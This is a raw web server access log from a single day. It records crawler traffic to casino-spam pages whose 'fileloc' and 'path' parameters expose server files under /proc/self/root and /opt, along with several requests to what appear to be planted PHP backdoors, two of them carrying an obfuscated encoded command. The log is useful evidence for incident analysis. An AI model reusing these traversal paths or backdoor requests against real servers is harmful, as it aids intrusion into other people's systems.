216.73.216.11 - - [01/Nov/2025:08:42:18 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fsmarty%2Fsmarty.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fsmarty HTTP/1.1" 200 4483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:18 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ftroff%2Ftroff.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ftroff HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:19 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fd%2Fd.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fd HTTP/1.1" 200 4980 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:19 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss%2F_pro.scss&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss HTTP/1.1" 200 3920 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
100.28.49.152 - - [01/Nov/2025:08:42:19 -0400] "GET /spielbank-pramie-ohne-einzahlung-beste-no-vorleistung-boni-2025/?fileloc=//proc/thread-self/root/bin/tabs&path=//proc/thread-self/root/bin HTTP/1.1" 200 2967 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:42:20 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Febnf%2Febnf.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Febnf HTTP/1.1" 200 4149 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:21 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ffortran%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ffortran HTTP/1.1" 200 3526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:20 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss%2Fswitch.css&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss HTTP/1.1" 200 3267 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:21 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fidl%2Fidl.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fidl HTTP/1.1" 200 7970 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.223 - - [01/Nov/2025:08:42:22 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cloudlinux/alt-php84 HTTP/1.1" 200 2914 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:42:22 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fscss%2F_blocks.scss&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fscss HTTP/1.1" 200 4256 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:22 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fscss%2Fswitch.css&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fscss HTTP/1.1" 200 3284 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.188.200.18 - - [01/Nov/2025:08:37:26 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343234362p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303634362q6532393465386431626231656462336461343033633830313035656361623436222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:42:23 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fvelocity%2Fvelocity.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fvelocity HTTP/1.1" 200 4446 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:23 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss%2F_general.scss&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss HTTP/1.1" 200 2896 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:08:42:23 -0400] "GET /q-~68Ihi6ipZanTpQQFIl9yudn1GNcHPyDZ27751/ HTTP/1.1" 200 4138 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:42:26 -0400] "GET /items/1423807374.htm HTTP/1.1" 200 19014 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
44.223.232.55 - - [01/Nov/2025:08:42:24 -0400] "GET /spielsaal-qua-1-euroletten-einzahlung-2025-unser-besten-angebote-as-part-of-deutschland/?path=//proc/self/root/lib/tuned/cloudlinux-default HTTP/1.1" 200 3378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:42:25 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fscss%2Findex.scss&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fscss HTTP/1.1" 200 2640 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:25 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ftornado%2Ftornado.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ftornado HTTP/1.1" 200 3551 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:23 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fpegjs%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fpegjs HTTP/1.1" 200 3374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
69.197.179.242 - - [01/Nov/2025:08:42:26 -0400] "GET /wp-content/x072d63/index.php?id=893896 HTTP/1.1" 200 0 "https://creativefinishings.com/wp-content/x072d63/index.php?id=893896" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
216.73.216.11 - - [01/Nov/2025:08:42:25 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fscheme%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fscheme HTTP/1.1" 200 3517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:26 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fz80%2Fz80.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fz80 HTTP/1.1" 200 3755 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:26 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fmathematica%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fmathematica HTTP/1.1" 200 3618 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:27 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ftiddlywiki%2Ftiddlywiki.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ftiddlywiki HTTP/1.1" 200 5091 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.215.235.20 - - [01/Nov/2025:08:42:27 -0400] "GET /freispiele-blos-einzahlung2025-beste-freespins-kostenfrei/?fileloc=//opt/alt/tests/alt-php81-phpiredis_1.0.1-1.el8/reader_005.phpt&path=//opt/alt/tests/alt-php81-phpiredis_1.0.1-1.el8 HTTP/1.1" 200 3309 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:42:28 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss%2F_saveconfirm.scss&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss HTTP/1.1" 200 2662 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:08:42:28 -0400] "GET /q-~23lHyBhYgW4B2yuEnAWOZgPwHCV2IiNB8602/ HTTP/1.1" 200 4141 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.11 - - [01/Nov/2025:08:42:28 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fstex%2Ftest.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fstex HTTP/1.1" 200 3575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:29 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fhaml%2Fhaml.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fhaml HTTP/1.1" 200 4124 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:30 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fadvanced-custom-fields%2Fincludes%2Fadmin%2Fviews%2Fupgrade%2Fnotice.php&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fadvanced-custom-fields%2Fincludes%2Fadmin%2Fviews%2Fupgrade HTTP/1.1" 200 3529 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:28 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fsql%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fsql HTTP/1.1" 200 3731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:30 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fsoy%2Fsoy.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fsoy HTTP/1.1" 200 4841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:08:42:31 -0400] "GET /q-~63ufUsOH9HGRho8ZokcRJDeCHy5dhQXa24828/ HTTP/1.1" 200 4121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:42:30 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fscss%2F_general.scss&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fscss HTTP/1.1" 200 3426 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:31 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp72%2Fusr%2Finclude%2Fphp%2Fext%2Fmbstring%2Flibmbfl%2Fmbfl%2Fmbfl_consts.h&path=%2F%2Fopt%2Falt%2Fphp72%2Fusr%2Finclude%2Fphp%2Fext%2Fmbstring%2Flibmbfl%2Fmbfl HTTP/1.1" 200 3746 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.167.144.213 - - [01/Nov/2025:08:42:32 -0400] "GET /items/110860042.htm HTTP/1.1" 200 18938 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.11 - - [01/Nov/2025:08:42:32 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fnginx%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fnginx HTTP/1.1" 200 4097 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
50.16.248.61 - - [01/Nov/2025:08:42:31 -0400] "GET /portfolio-commercial?fileloc=//opt/alt/openssl/include/openssl/asn1.h&path=//opt/alt/openssl/include/openssl HTTP/1.1" 200 19038 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:42:33 -0400] "GET /items/1424053540.htm HTTP/1.1" 200 19499 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:08:42:32 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fhaml%2Ftest.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fhaml HTTP/1.1" 200 3519 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:32 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss%2F_options.scss&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss HTTP/1.1" 200 2688 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:42:32 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp72%2Fusr%2Finclude%2Fphp%2Fext%2Fmbstring%2Flibmbfl%2Fmbfl%2Fmbfilter.h&path=%2F%2Fopt%2Falt%2Fphp72%2Fusr%2Finclude%2Fphp%2Fext%2Fmbstring%2Flibmbfl%2Fmbfl HTTP/1.1" 200 5792 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
50.19.221.48 - - [01/Nov/2025:08:42:35 -0400] "GET /spielsaal-qua-1-euroletten-einzahlung-2025-unser-besten-angebote-as-part-of-deutschland/?path=//opt/cloudlinux/alt-php84/root/etc/mariadb104 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:42:37 -0400] "GET /q-~203aAgMw7rRj1KFSYaOKzOlwTdF7hGxkZ2760/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.223 - - [01/Nov/2025:08:42:37 -0400] "GET /?path=//proc/self/root/proc/2966092/root/opt/cloudlinux/rhn_hooks HTTP/1.1" 200 2818 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:42:40 -0400] "GET /?q=2148186115800&channel=199e08&from=https://creativefinishings.com/select.cgi?q-~234thvKPc9jQvYoIWDLFtdwGi3qiOIbYi12147/ HTTP/1.1" 200 18746 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:42:40 -0400] "GET /items/1423805513.htm HTTP/1.1" 200 18050 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.73.142.41 - - [01/Nov/2025:08:42:39 -0400] "GET /a-journey-through-timeless-realms-in-crash-x-game/?path=//opt/alt/ruby19/share/man HTTP/1.1" 200 3338 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:42:42 -0400] "GET /q-~216ZxtCfNr9xjQaYDVDp8eCRBTuZLoVne23029/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.203.111.15 - - [01/Nov/2025:08:42:44 -0400] "GET /roque-licenciada-melhor-bonus-guia-completo/?path=//var/run/cagefs HTTP/1.1" 200 3339 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:42:45 -0400] "GET /q-~87ILGiBovGskh3pdccjFDm6q0aefxVuk16984/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.223 - - [01/Nov/2025:08:42:46 -0400] "GET /?path=//proc/self/root/proc/2966092/root/etc/environment-modules HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.197 - - [01/Nov/2025:08:42:46 -0400] "GET /items/1423917794.htm HTTP/1.1" 200 19935 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.188.200.18 - - [01/Nov/2025:08:37:47 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030343236372p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303636372q3736336131323461666237306561363365353861646465373866363335306465222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
35.174.253.85 - - [01/Nov/2025:08:42:47 -0400] "GET /das-beste-world-wide-web-spielbank-via-herumtoben-vortragen/?path=//usr/lib/firmware/nvidia/gm200 HTTP/1.1" 200 3389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:42:48 -0400] "GET /q-~242tRvm8G1RI0PkqMhtR5yurCFrd1YKZv16397/?path=/home/creaqbdc/public_html/tmp HTTP/1.1" 200 2872 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.11 - - [01/Nov/2025:08:42:51 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent%2FFilterControllerEvent.php&path=%2F%2Fopt%2Falt%2Fphp55%2Fusr%2Fshare%2Fpear%2FSymfony%2FComponent%2FHttpKernel%2FEvent HTTP/1.1" 200 3420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
